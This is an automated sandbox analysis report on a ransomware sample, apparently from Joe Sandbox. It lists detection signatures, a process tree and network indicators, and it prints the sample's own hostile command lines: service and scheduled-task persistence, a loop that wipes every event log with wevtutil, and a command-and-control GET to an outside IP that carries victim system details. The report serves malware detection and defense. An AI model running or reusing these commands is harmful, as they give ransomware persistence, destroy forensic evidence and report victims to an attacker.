
Windows Analysis Report
xKvkNk9SXR.exe

Overview

General Information

Sample name: xKvkNk9SXR.exe
renamed because original name is a hash value
Original sample name: 2619065d71a290ad0369cb3c19f1d5a58c43bf7abb52fb8828727483d32bdcf7.exe
Analysis ID: 1569986
MD5: 603b398c14ffc8c0b647c58e9886c557
SHA1: 58b80929a19cfb40c683cc10f5c8167e5543c553
SHA256: 2619065d71a290ad0369cb3c19f1d5a58c43bf7abb52fb8828727483d32bdcf7
Tags: exe, user-JAMESWT_MHT

Detection

TrojanRansom
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected TrojanRansom
AI detected suspicious sample
Contains functionality to clear event logs
Deletes shadow drive data (may be related to ransomware)
Drops PE files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample is not signed and drops a device driver
Sigma detected: Suspicious File Creation In Uncommon AppData Folder
Sigma detected: Suspicious New Service Creation
Sigma detected: WScript or CScript Dropper
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes or reads registry keys via WMI
Checks for available system drives (often done to infect USB drives)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to enumerate network shares
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates driver files
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Startup Folder File Write
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • xKvkNk9SXR.exe (PID: 7032 cmdline: "C:\Users\user\Desktop\xKvkNk9SXR.exe" MD5: 603B398C14FFC8C0B647C58E9886C557)
    • conhost.exe (PID: 6572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1396 cmdline: C:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • tasklist.exe (PID: 2104 cmdline: tasklist /v /fo csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 4508 cmdline: findstr /i "dcdcf" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
    • cmd.exe (PID: 6604 cmdline: C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • sc.exe (PID: 6004 cmdline: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
    • cmd.exe (PID: 4308 cmdline: C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • sc.exe (PID: 6508 cmdline: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
    • cmd.exe (PID: 6152 cmdline: C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • sc.exe (PID: 4708 cmdline: sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
    • cmd.exe (PID: 2796 cmdline: C:\Windows\system32\cmd.exe /c ver MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • cmd.exe (PID: 5880 cmdline: C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • wscript.exe (PID: 1440 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
        • cmd.exe (PID: 5804 cmdline: C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 6516 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 3292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tasklist.exe (PID: 344 cmdline: tasklist /v MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • find.exe (PID: 2072 cmdline: find /I /c "dcdcf" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
          • timeout.exe (PID: 6584 cmdline: timeout /t 15 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 2164 cmdline: tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • find.exe (PID: 5300 cmdline: find /I "xKvkNk9SXR.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
          • timeout.exe (PID: 5428 cmdline: timeout /t 15 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 4980 cmdline: tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • find.exe (PID: 5028 cmdline: find /I "xKvkNk9SXR.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
          • timeout.exe (PID: 5796 cmdline: timeout /t 15 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 3772 cmdline: tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • find.exe (PID: 5484 cmdline: find /I "xKvkNk9SXR.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
          • timeout.exe (PID: 1476 cmdline: timeout /t 15 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 6300 cmdline: tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • find.exe (PID: 4744 cmdline: find /I "xKvkNk9SXR.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
          • timeout.exe (PID: 1868 cmdline: timeout /t 15 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 2764 cmdline: tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • find.exe (PID: 5972 cmdline: find /I "xKvkNk9SXR.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
          • timeout.exe (PID: 2516 cmdline: timeout /t 15 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 6308 cmdline: tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • find.exe (PID: 4688 cmdline: find /I "xKvkNk9SXR.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
    • cmd.exe (PID: 1848 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • schtasks.exe (PID: 6488 cmdline: schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\user\AppData\S-2153.bat'" /f MD5: 48C2FE20575769DE916F48EF0676A965)
      • WmiPrvSE.exe (PID: 5840 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 64ACA4F48771A5BA50CD50F2410632AD)
    • cmd.exe (PID: 6408 cmdline: C:\Windows\system32\cmd.exe /c echo %date%-%time% MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • cmd.exe (PID: 7156 cmdline: C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • systeminfo.exe (PID: 4984 cmdline: systeminfo MD5: 36CCB1FFAFD651F64A22B5DA0A1EA5C5)
      • find.exe (PID: 1972 cmdline: find /i "os name" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
    • cmd.exe (PID: 1276 cmdline: C:\Windows\system32\cmd.exe /c systeminfo|find /i "original" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • systeminfo.exe (PID: 6768 cmdline: systeminfo MD5: 36CCB1FFAFD651F64A22B5DA0A1EA5C5)
      • find.exe (PID: 3116 cmdline: find /i "original" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
    • cmd.exe (PID: 1628 cmdline: C:\Windows\system32\cmd.exe /c ver MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
  • cmd.exe (PID: 5560 cmdline: C:\Windows\SYSTEM32\cmd.exe /c ""C:\Users\user\AppData\S-2153.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • wscript.exe (PID: 5496 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • cmd.exe (PID: 1972 cmdline: C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5844 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 1848 cmdline: tasklist /v MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
        • find.exe (PID: 2608 cmdline: find /I /c "dcdcf" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
  • Xinfecter.exe (PID: 4148 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" MD5: 603B398C14FFC8C0B647C58E9886C557)
    • conhost.exe (PID: 616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Process Memory Space: xKvkNk9SXR.exe PID: 7032 | JoeSecurity_TrojanRansom | Yara detected TrojanRansom | Joe Security |
Process Memory Space: Xinfecter.exe PID: 4148 | JoeSecurity_TrojanRansom | Yara detected TrojanRansom | Joe Security |

System Summary

Source: File created | Author: Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\Desktop\xKvkNk9SXR.exe, ProcessId: 7032, TargetFilename: C:\Users\user\AppData\S-6748.bat
Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, CommandLine: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6604, ParentProcessName: cmd.exe, ProcessCommandLine: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, ProcessId: 6004, ProcessName: sc.exe
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5880, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" , ProcessId: 1440, ProcessName: wscript.exe
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\Desktop\xKvkNk9SXR.exe, ProcessId: 7032, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5880, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" , ProcessId: 1440, ProcessName: wscript.exe
Source: Process started | Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community | Data: Command: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, CommandLine: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6604, ParentProcessName: cmd.exe, ProcessCommandLine: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, ProcessId: 6004, ProcessName: sc.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-06T13:51:12.165027+0100 | 2045821 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49705 | 185.147.34.53 | 3586 | TCP


AV Detection

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | ReversingLabs: Detection: 81%
Source: xKvkNk9SXR.exe | ReversingLabs: Detection: 81%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.8% probability
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Joe Sandbox ML: detected
Source: xKvkNk9SXR.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A14230 CryptAcquireContextA,CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,__CxxThrowException@8,CryptAcquireContextA,___std_exception_copy,0_2_00A14230
Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A147F0 CryptReleaseContext,0_2_00A147F0
Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A14900 CryptGenRandom,CryptReleaseContext,__CxxThrowException@8,0_2_00A14900
Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A14390 CryptAcquireContextA,GetLastError,CryptReleaseContext,0_2_00A14390
Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A14720 CryptReleaseContext,0_2_00A14720
Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A14760 CryptGenRandom,__CxxThrowException@8,0_2_00A14760
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00604230 CryptAcquireContextA,CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,__CxxThrowException@8,CryptAcquireContextA,___std_exception_copy,42_2_00604230
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_006047F0 CryptReleaseContext,42_2_006047F0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00604900 CryptGenRandom,CryptReleaseContext,__CxxThrowException@8,42_2_00604900
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00604390 CryptAcquireContextA,GetLastError,CryptReleaseContext,42_2_00604390
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00604760 CryptGenRandom,__CxxThrowException@8,42_2_00604760
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00604720 CryptReleaseContext,42_2_00604720
Source: xKvkNk9SXR.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: xKvkNk9SXR.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\Unknown\source\repos\ConsoleApplication5_A\Release\ConsoleApplication5_A.pdb source: xKvkNk9SXR.exe, Xinfecter.exe.0.dr
Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | File opened: z:
Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | File opened: x:
Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | File opened: v:
Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | File opened: t:
Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | File opened: r:
Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | File opened: p:
Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | File opened: n:
Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | File opened: l:
Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | File opened: j:
Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | File opened: h:
Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | File opened: f:
Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | File opened: b:
Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | File opened: y:
Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | File opened: w:
Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | File opened: u:
Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | File opened: s:
Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | File opened: q:
Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | File opened: o:
Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | File opened: m:
Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | File opened: k:
Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | File opened: i:
Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | File opened: g:
Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | File opened: e:
Source: C:\Windows\System32\cmd.exe | File opened: c:
Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | File opened: a:
Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_009C4500 NetUserEnum,NetApiBufferFree,NetApiBufferFree,NetApiBufferFree,NetApiBufferFree,0_2_009C4500
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_005B4500 NetUserEnum,NetApiBufferFree,NetApiBufferFree,NetApiBufferFree,NetApiBufferFree,42_2_005B4500
Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_009C8240 SetErrorMode,FindFirstFileW,0_2_009C8240
Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_009C8380 SetErrorMode,FindFirstFileW,SetErrorMode,FindFirstFileW,0_2_009C8380
Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_009BFCC9 FindNextFileW,FindClose,SetErrorMode,FindFirstFileW,0_2_009BFCC9
Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_009CAF50 SetErrorMode,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose,0_2_009CAF50
Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_009C9ABA lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose,SetErrorMode,FindFirstFileW,0_2_009C9ABA
Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A7BA6B FindFirstFileExA,0_2_00A7BA6B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_005B8240 SetErrorMode,FindFirstFileW,42_2_005B8240
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_005B8380 SetErrorMode,FindFirstFileW,SetErrorMode,FindFirstFileW,42_2_005B8380
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_005BAF50 SetErrorMode,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose,42_2_005BAF50
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_0066BA6B FindFirstFileExA,42_2_0066BA6B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_005B9ABA lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose,SetErrorMode,FindFirstFileW,42_2_005B9ABA
Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_009CD950 GetLogicalDriveStringsA,0_2_009CD950

Networking

Source: Network traffic | Suricata IDS: 2045821 - Severity 1 - ET MALWARE [ANY.RUN] RCRU64 Ransomware Variant CnC Activity : 192.168.2.5:49705 -> 185.147.34.53:3586
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 3586
Source: global traffic | TCP traffic: 192.168.2.5:49705 -> 185.147.34.53:3586
Source: global traffic | HTTP traffic detected: GET /110_And_Netword_Drive_Size:0_Encryption_Mode:_Fast_Mode!Empty]_____03/10/2023,_10:57:18$_06/12/2024-_7:51:[Version_10.0.19045.2006|Microsoft_Windows_10_Prohg3l,8.46.123.228~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&INW15*7.999268(2)2,d5insomnia1441@gmail.com HTTP/1.1 | Host: 185.147.34.53 | Connection: close
Source: Joe Sandbox View | IP Address: 104.26.12.205
Source: Joe Sandbox View | IP Address: 185.147.34.53
Source: Joe Sandbox View | ASN Name: HOSTSLIM-GLOBAL-NETWORKNL
Source: unknown | DNS query: name: api.ipify.org
Source: unknown | TCP traffic detected without corresponding DNS query: 185.147.34.53
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_009C6808 InternetReadFile,0_2_009C6808
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Accept: text/* | User-Agent: YourUserAgent | Host: api.ipify.org
Source: global traffic | DNS traffic detected: DNS query: api.ipify.org
Source: xKvkNk9SXR.exe, 00000000.00000002.3297094059.0000000000FAF000.00000004.00000020.00020000.00000000.sdmp, xKvkNk9SXR.exe, 00000000.00000002.3297094059.0000000000F3F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://api.ipify.org
Source: xKvkNk9SXR.exe, 00000000.00000002.3297094059.0000000000F97000.00000004.00000020.00020000.00000000.sdmp, xKvkNk9SXR.exe, 00000000.00000002.3296757158.0000000000988000.00000004.00000010.00020000.00000000.sdmp, xKvkNk9SXR.exe, 00000000.00000002.3297094059.0000000000FAF000.00000004.00000020.00020000.00000000.sdmp, xKvkNk9SXR.exe, 00000000.00000002.3297094059.0000000000F3F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://api.ipify.org/
Source: xKvkNk9SXR.exe, 00000000.00000002.3297094059.0000000000FAF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://api.ipify.org/C#O
Source: xKvkNk9SXR.exe, 00000000.00000002.3297094059.0000000000FAF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://api.ipify.org/Y/O
Source: xKvkNk9SXR.exe, Xinfecter.exe.0.dr | String found in binary or memory: https://www.coinbase.com/how-to-buy/bitcoin
Source: xKvkNk9SXR.exe, Xinfecter.exe.0.dr | String found in binary or memory: https://www.kraken.com/learn/buy-bitcoin-btc

Spam, unwanted Advertisements and Ransom Demands

Source: Yara match | File source: Process Memory Space: xKvkNk9SXR.exe PID: 7032, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Xinfecter.exe PID: 4148, type: MEMORYSTR
Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1" 0_2_009D4049
Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1" 0_2_009DC170
Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1" 0_2_009DD08F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1" 42_2_005C4049
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1" 42_2_005CBD00
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1" 42_2_005CD08F
